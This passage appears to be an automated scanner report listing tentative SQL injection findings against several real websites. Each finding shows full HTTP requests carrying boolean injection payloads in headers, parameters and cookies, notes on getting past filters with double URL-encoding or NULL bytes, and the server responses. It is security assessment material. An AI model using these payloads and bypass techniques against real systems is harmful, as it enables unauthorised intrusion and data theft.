The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 20435182'%20or%201%3d1--%20 and 20435182'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_mint/?js HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: https://client.trafficshaping.com/signin
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d1--%20
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:52:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com
Content-Length: 2003
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://www.trafficshaping.com/_mint/?record&key=384148426b333545573532697a435238386b393231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
Mint.save();

Request 2

GET /_mint/?js HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: https://client.trafficshaping.com/signin
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d2--%20
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:19 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:52:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com
Content-Length: 2015
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://www.trafficshaping.com/_mint/?record&key=4455513933353556785a75734b5367744a32383868616979393231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
Mint.save();
1.10. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ga_vid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_vid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:53:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>See How the GMC Terrain Stacks Up Against the Tucson. Compare Now!</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:53:55 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
1.11. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00'&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:59:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>Exceptional Engine Protection For Your Classic Vehicle.</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00''&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:59:53 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
1.12. http://o.aolcdn.com/os_merge/ [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The file parameter appears to be vulnerable to SQL injection attacks. The payloads 80562684'%20or%201%3d1--%20 and 80562684'%20or%201%3d2--%20 were each submitted in the file parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/skin/slick-redux/222084
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1835
Cache-Control: public, max-age=30
Expires: Sun, 27 Feb 2011 17:46:13 GMT
Date: Sun, 27 Feb 2011 17:45:43 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 400 - Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js</u></p><p><b>description</b> <u>The request sent by the client was syntactically incorrect (Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooks
...[SNIP]...

Request 2

GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d2--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/skin/slick-redux/222084
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 26 Jan 2011 20:59:41 GMT
Content-Type: text/plain
Cache-Control: public, max-age=2592000
Expires: Tue, 29 Mar 2011 17:45:43 GMT
Date: Sun, 27 Feb 2011 17:45:43 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15821

(function(d,c){d.inlineCSS=function(b){var a=c.createElement("style"),e=c.getElementsByTagName("head")[0];a.setAttribute("type","text/css");if(a.styleSheet)a.styleSheet.cssText=b;else{b=c.createTextNode(b);a.appendChild(b)}e.appendChild(a)}})(jQuery,document);
// jquery.openwindow-1.0.min.js
(function(i,o){var q=0;i.openWindow=function(h,a){a=i.extend({width:"60%",height:"60%",top:"middle",left:"center",location:1,menubar:0,toolbar:0,bookmarks:0,status:0,resizable:1,scroll:1,gui:40,name:"jQuery_popUp",nu:0,focus:1},a);var b=[],m=a.nu?a.name+q++:a.name,j=o.screen,e=j.height,k=j.width,f=a.width,g=a.height,c=a.left,d=a.top,r=a.gui;j=["location","menubar","toolbar","bookmarks","status","resizable","scroll"];var p=j.length,n=Math.round,l=function(s,t){return n(t*s.replace("%","")/100)};if(f.indexOf)if(f.indexOf("%"))f=
l(f,k);b.push("width="+f);if(g.indexOf)if(g.indexOf("%"))g=l(g,e);b.push("height="+g);if(c.indexOf)if(c.indexOf("%")!==-1)c=l(c,k);else switch(c){case "center":c=n((k-f)/2);break;case "left":c=0;break;case "right":c=k-f}b.push("left="+c);if(d.indexOf)if(d.indexOf("%")!==-1)d=l(d,e);else switch(d){case "middle":d=n((e-g)/2)-r;break;case "top":d=0;break;case "bottom":d=e-g}for(b.push("top="+d);p--;){e=j[p];b.push(e+"="+(a[e]?"yes":"no"))}h=o.open(h,m,b.join(","));a.focus&&h.focus();return h};i.fn.openWindow=
function(h){return this.each(function(){var a=this,b=a.href;b&&i(a).click(function(m){m.preventDefault();i.openWindow(b,h)})})}})(jQuery,window);
/*

   jQuery Omniture Tracking Plugin
   Eaily attach click tracking to any link.
   
   Dependencies:
   - Omniture H Code (s_265 object)
   - jQuery 1.4.2
   
   Usage:
   
   $("#my-link").omniTrack({
       suite: "aolshare", // Suite the click
...[SNIP]...
1.13. http://peoplepond.com/_mint/ [MintUnique cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://peoplepond.com
Path:   /_mint/

Issue detail

The MintUnique cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the MintUnique cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_mint/?js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d1--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:04 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:44:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com
Content-Length: 5171
Connection: close
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://peoplepond.com/_mint/?record&key=343430744850704d4435326e6e73383850754b394350495a4d61673231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.UserAgent007 =
{
   versionHigh            : 16,
   flashVersion        : 0,
   resolution            : '0x0',
   detectFlashVersion    : function ()
   {
       var ua = navigator.userAgent.toLowerCase();
       if (navigator.plug
...[SNIP]...

Request 2

GET /_mint/?js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d2--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:08 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:44:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com
Content-Length: 5161
Connection: close
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://peoplepond.com/_mint/?record&key=383430353263524c3861594c76386f69676f565539326b31';
   path        = path.replace(/^https?:/, window.location.protocol);
   
